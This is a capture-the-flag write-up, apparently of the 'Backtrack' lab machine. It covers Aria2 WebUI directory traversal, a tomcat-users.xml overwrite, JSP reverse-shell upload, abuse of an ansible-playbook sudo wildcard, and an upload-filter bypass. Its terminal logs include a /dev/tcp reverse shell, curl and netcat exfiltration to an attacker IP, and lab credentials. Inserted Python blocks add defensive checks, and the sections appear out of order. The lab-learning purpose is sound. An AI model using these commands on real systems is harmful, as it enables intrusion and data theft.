The HTTP server on port 8888 returns a WebUI called Aria2 WebUI. Quickly searching for a vuln on Google:
The server on port 8888 may be vulnerable to directory traversal.
2b - Directory Traversal
After clearing the cache on the browser, proxying all requests to Burp and holding the requests for a while without forwarding, we can see how the WebUI behaves and what it sends without having to go through the code. We intercept multiple requests without interacting with the browser, but this is the one we are interested in:
The POST request will be modified in Repeater
Directory Traversal was successful
Amazing! This is a great way to look inside the target's files.
2c - Gathering sensitive info
Trying to brute-force some well-known files using Intruder crashes the Aria server. We have to access files manually in order not to overwhelm and crash the server.
/etc/passwd
/proc/self/environ
/opt/tomcat/conf/tomcat-users.xml
2z - What we know so far
There are 4 accounts that can be considered human based on their IDs: root, tomcat, orville and wilbur
We cannot log in as tomcat through ssh (its shell is /bin/false)
We collected a password from a well-known configuration file for tomcat
The server on port 8888 runs with privileges of the tomcat user
3 - Foothold
3a - Dead-ends
id_rsa
Trying to collect the private key of the users (except tomcat) did not yield anything
authorized_keys
Trying to authorize my own key by writing to the respective .ssh folders did not work because of a lack of adequate permissions for the tomcat user:
Upload succeeds, but cannot be effectively stored in the requested destination location
3b - Tomcat, help!
The tomcat admin credentials we got were great, but the user in question has no useful privileges. This is because its role is only 'manager-script'.
Cannot access host-manager
Cannot access manager
We have to find a way to elevate this tomcat user. This can be done only by editing the /opt/tomcat/conf/tomcat-users.xml file. But how can we do that?
Well, since we already know that the server on port 8888 has the Linux 'tomcat' user's privileges, the server can probably overwrite tomcat-users.xml by downloading a new one!
I will host the following file on my machine, where the roles are significantly higher:
And now using the Aria2 WebUI:
The granular options provided on Aria2 WebUI are very helpful
Fingers crossed
We now have access to the admin panels!
3c - Have I been here before?
If you look closely at the /manager/html panel above, you will notice a path called /reverse_shell!
Requesting it gives us the following:
Why is metasploit mentioned here?!
I am not sure what is happening here, but it is not worth investigating. I do have enough privileges to upload a shell of my own. I will be using a webshell that is bundled in /usr/share/webshells/jsp/jsp-reverse.jsp.
Before uploading, change line 74 to Process proc = rt.exec("/bin/bash");
With socat listening and proxying on the target machine, I am able to do this:
This site seems to indicate it is run by the Orville user
The website does not give us much wiggle room to try and exploit it from the browser, and it seemed like a dead end, at least while I was tomcat. Now that I am wilbur, I have access to a very important file:
This was the missing puzzle piece! Now I can login and proceed:
Logging in with the newfound credentials stored in /home/wilbur/from_orville.txt
Landing page after login
We can see that there are no images yet. Let us upload an image of our own and see what happens.
The image appeared after uploading
Now the question is: can we upload a shell? I will try to upload my favorite PHP webshell:
It claims to have refused the upload; there is seemingly a whitelist in place
Indeed, the shell was not stored
We have to bypass these filters:
Adding a 'fake' extension bypasses the filters
However, trying to go to http://backtrack.thm:2345/uploads/shell.gif.php just downloads the file! But we see that in the root directory (above uploads/), where login.php and dashboard.php are stored, PHP files are executed instead of being served as-is. Dead ends:
Apache/2.4.41 does not have a known directory traversal published, so storing it somewhere on the filesystem using wilbur and trying to access it through Apache won't work
/var/www/html is not accessible using any of the users we compromised
We can however try to add some path traversal sequences (../) to the filename:
A single ../ still stores the file in uploads/, so that fails. We have to use Intruder to try to store it anywhere above uploads/ (ideally directly above it). To do that, we will use a wordlist from a well-known repository:
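Two of the weaknesses this writeup leans on share one root cause: a user-controlled path that is joined to a base directory without checking where it resolves. The Aria2 WebUI on port 8888 let us read files outside its directory (section 2b), and the gallery's upload filter judges a name like shell.gif.php by the wrong extension and lets traversal sequences in the filename relocate the file. The block below is an added example, not code from the room or from either application; the base directory, the extension allowlist and the magic bytes are constructed assumptions.

```python
import os
from pathlib import Path

# Constructed allowlist (not taken from the gallery's code): accepted final
# extensions and the magic bytes a file with that extension must start with.
ALLOWED_EXT = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

def contained_in(base: str, candidate: str) -> bool:
    """True only if candidate resolves to base itself or to something below it."""
    base_r = os.path.realpath(base)
    cand_r = os.path.realpath(candidate)
    return cand_r == base_r or cand_r.startswith(base_r + os.sep)

def check_serve_path(base: str, requested: str) -> tuple:
    """What a file-serving endpoint (the 8888 WebUI's weak spot) should do with a
    user-supplied path: treat it as relative to base and refuse anything that
    resolves outside base, however many ../ or symlinks it goes through."""
    candidate = os.path.join(base, requested.lstrip("/\\"))
    if not contained_in(base, candidate):
        return (False, f"traversal: {requested!r} escapes {base}")
    return (True, os.path.realpath(candidate))

def check_upload(upload_dir: str, filename: str, data: bytes) -> tuple:
    """Hardened version of the gallery's filter. Keeps only the basename, so ../
    in the name cannot relocate the file; judges the extension by the LAST
    suffix, so shell.gif.php is not accepted as a .gif; and requires the
    content to carry the magic bytes of the claimed image type."""
    name = os.path.basename(filename.replace("\\", "/"))
    ext = Path(name).suffix.lower()
    if not name or ext not in ALLOWED_EXT:
        return (False, f"extension not allowed: {filename!r}")
    if not any(data.startswith(magic) for magic in ALLOWED_EXT[ext]):
        return (False, f"content is not a {ext} image: {filename!r}")
    dest = os.path.join(upload_dir, name)
    if not contained_in(upload_dir, dest):  # cannot fail after basename(); kept as a guard
        return (False, "destination escapes the upload directory")
    return (True, dest)

if __name__ == "__main__":
    base = "/opt/gallery_example"            # constructed path
    for req in ("uploads/cat.gif", "../../etc/passwd"):
        print(req, "->", check_serve_path(base, req))
    for fn, body in (("shell.gif.php", b"GIF89a<?php"), ("../shell.gif", b"GIF89a\x01")):
        print(fn, "->", check_upload(base + "/uploads", fn, body))
```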
┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -p- backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 06:57 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.100s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6800/tcp open unknown
8080/tcp open http-proxy
8888/tcp open sun-answerbook
Nmap done: 1 IP address (1 host up) scanned in 250.16 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -A -p22,6800,8080,8888 backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 07:02 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
| 256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
|_ 256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
8080/tcp open http Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.93
8888/tcp open sun-answerbook?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/html
| Date: Sat, 12 Oct 2024 04:02:31 GMT
| Connection: close
| <!doctype html>
| <html>
| <!-- {{{ head -->
| <head>
| <link rel="icon" href="../favicon.ico" />
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <meta name="theme-color" content="#0A8476">
| <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
| <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
| <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
| <!-- }}} -->
| <body ng-controller="MainCtrl" ng-cloak>
| <!-- {{{ Icons -->
|_ <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8888-TCP:V=7.94SVN%I=7%D=10/12%Time=6709F4D8%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,13F0,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html
--SNIP--
SF:olute;\x20width:\x200;\x20height:\x200;\x20overflow:\x20hidden;\"\x20ve
SF:rsion=\"1\.1\"\x20xm");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 97.57 ms 10.11.0.1
2 95.60 ms backtrack.thm (10.10.237.46)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.03 seconds
tomcat@Backtrack:/tmp$ cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
tomcat@Backtrack:/tmp$ curl -X POST --data-binary @tomcat-enum.txt.b64 http://10.11.85.12:90
<a-binary @tomcat-enum.txt.b64 http://10.11.85.12:90
curl: (1) Received HTTP/0.9 when not allowed
tomcat@Backtrack:/tmp$
┌──(kali㉿kali)-[~/public_folder]
└─$ nc -lvnp 90 > tomcat-enum.txt.b64
listening on [any] 90 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.156.152] 40854
┌──(kali㉿kali)-[~/public_folder]
└─$ # removed HTTP headers from response, kept body
┌──(kali㉿kali)-[~/public_folder]
└─$ nano tomcat-enum.txt.b64
┌──(kali㉿kali)-[~/public_folder]
└─$ dos2unix tomcat-enum.txt.b64
dos2unix: converting file tomcat-enum.txt.b64 to Unix format...
┌──(kali㉿kali)-[~/public_folder]
└─$ cat tomcat-enum.txt.b64 | base64 -d > tomcat-enum.txt
tomcat@Backtrack:/$ sudo -l
sudo -l
Matching Defaults entries for tomcat on Backtrack:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tomcat may run the following commands on Backtrack:
(wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.yml
tomcat@Backtrack:/tmp$ cat rev.yml
- hosts: localhost
tasks:
- name: rev
shell: bash -c 'bash -i >& /dev/tcp/10.11.85.12/9003 0>&1'
tomcat@Backtrack:/tmp$ sudo -u wilbur /usr/bin/ansible-playbook /opt/test_playbooks/../../../tmp/rev.yml
[WARNING]: provided hosts list is empty, only localhost is available. Note that
the implicit localhost does not match 'all'
--SNIP--
[WARNING]: Skipping plugin (/usr/lib/python3/dist-
packages/ansible/plugins/callback/sumologic.py) as it seems to be invalid:
module 'lib' has no attribute 'X509_V_FLAG_NOTIFY_POLICY'
PLAY [localhost] ***************************************************************
TASK [Gathering Facts] *********************************************************
ok: [localhost]
TASK [rev] *********************************************************************
┌──(kali㉿kali)-[~/public_folder]
└─$ nc -lvnp 9003
listening on [any] 9003 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.238.90] 33938
wilbur@Backtrack:/tmp$ id
id
uid=1004(wilbur) gid=1004(wilbur) groups=1004(wilbur)
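The sudo rule that `sudo -l` printed above is the classic wildcard-in-arguments misconfiguration: sudoers matches command-line arguments with shell-style wildcards, and in arguments `*` also matches `/`, so an argument that starts under /opt/test_playbooks/ can walk back out of it with ../ and still satisfy the rule. The audit helper below is an added example, not part of the writeup; the sudoers excerpt is constructed around the room's rule, and the remediation it points at is listing explicit playbook paths (or validating the path inside a wrapper script) instead of a glob.

```python
import fnmatch
import os
import re

# Constructed sudoers excerpt; the second line is the rule `sudo -l` showed on the box.
SUDOERS_SAMPLE = """\
Defaults env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
tomcat ALL=(wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.yml
wilbur ALL=(root) /usr/bin/systemctl restart tomcat
"""

def sudo_arg_matches(pattern: str, argument: str) -> bool:
    """sudoers matches command-line arguments with shell-style wildcards, and in
    arguments '*' matches '/' as well; fnmatchcase approximates that behaviour."""
    return fnmatch.fnmatchcase(argument, pattern)

def escapes_intended_dir(pattern: str, argument: str) -> bool:
    """True when the argument normalises to a path outside the directory the rule
    author evidently meant, i.e. the fixed prefix before the first '*'."""
    intended = os.path.normpath(os.path.dirname(pattern.split("*", 1)[0]))
    return not os.path.normpath(argument).startswith(intended + os.sep)

def is_escapable(pattern: str, argument: str) -> bool:
    """The rule accepts the argument AND the argument lands outside the intended dir."""
    return sudo_arg_matches(pattern, argument) and escapes_intended_dir(pattern, argument)

def wildcard_argument_rules(sudoers_text: str) -> list:
    """Return (line_no, command_spec) for every rule whose ARGUMENT part carries a
    wildcard; these are the rules to rewrite as explicit paths or a wrapper."""
    found = []
    for n, raw in enumerate(sudoers_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or "=" not in line:
            continue
        for spec in line.split("=", 1)[1].split(","):
            # drop the optional (runas) group and tags such as NOPASSWD:
            spec = re.sub(r"^\s*(\([^)]*\)\s*)?(?:[A-Z_]+:\s*)*", "", spec).strip()
            cmd_and_args = spec.split(None, 1)
            if len(cmd_and_args) == 2 and any(c in cmd_and_args[1] for c in "*?["):
                found.append((n, spec))
    return found
```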
wilbur@Backtrack:/tmp$ cd ~
wilbur@Backtrack:~$ ls -la
total 36
drwxrwx--- 5 wilbur wilbur 4096 Oct 13 07:34 .
drwxr-xr-x 4 root root 4096 Mar 9 2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 07:22 .ansible
lrwxrwxrwx 1 root root 9 Mar 9 2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar 9 2024 .bashrc
drwx------ 2 wilbur wilbur 4096 Oct 13 07:34 .cache
drwx------ 3 wilbur wilbur 4096 Oct 13 07:28 .gnupg
-rw------- 1 wilbur wilbur 48 Mar 9 2024 .just_in_case.txt
lrwxrwxrwx 1 root root 9 Mar 9 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar 9 2024 .profile
-rw------- 1 wilbur wilbur 461 Mar 9 2024 from_orville.txt
wilbur@Backtrack:~$ cat .just_in_case.txt
in case i forget :
wilbur:mYe317Tb9qTNrWFND7KF
wilbur@Backtrack:~$ pwd
pwd
/home/wilbur
wilbur@Backtrack:~$ ls -la
ls -la
total 28
drwxrwx--- 3 wilbur wilbur 4096 Oct 13 03:57 .
drwxr-xr-x 4 root root 4096 Mar 9 2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 03:57 .ansible
lrwxrwxrwx 1 root root 9 Mar 9 2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar 9 2024 .bashrc
-rw------- 1 wilbur wilbur 48 Mar 9 2024 .just_in_case.txt
lrwxrwxrwx 1 root root 9 Mar 9 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar 9 2024 .profile
-rw------- 1 wilbur wilbur 461 Mar 9 2024 from_orville.txt
wilbur@Backtrack:~$ cat fr*
cat fr*
Hey Wilbur, it's Orville. I just finished developing the image gallery web app I told you about last week, and it works just fine. However, I'd like you to test it yourself to see if everything works and secure.
I've started the app locally so you can access it from here. I've disabled registrations for now because it's still in the testing phase. Here are the credentials you can use to log in:
email : [email protected]
password : W34r3B3773r73nP3x3l$
wilbur@Backtrack:~$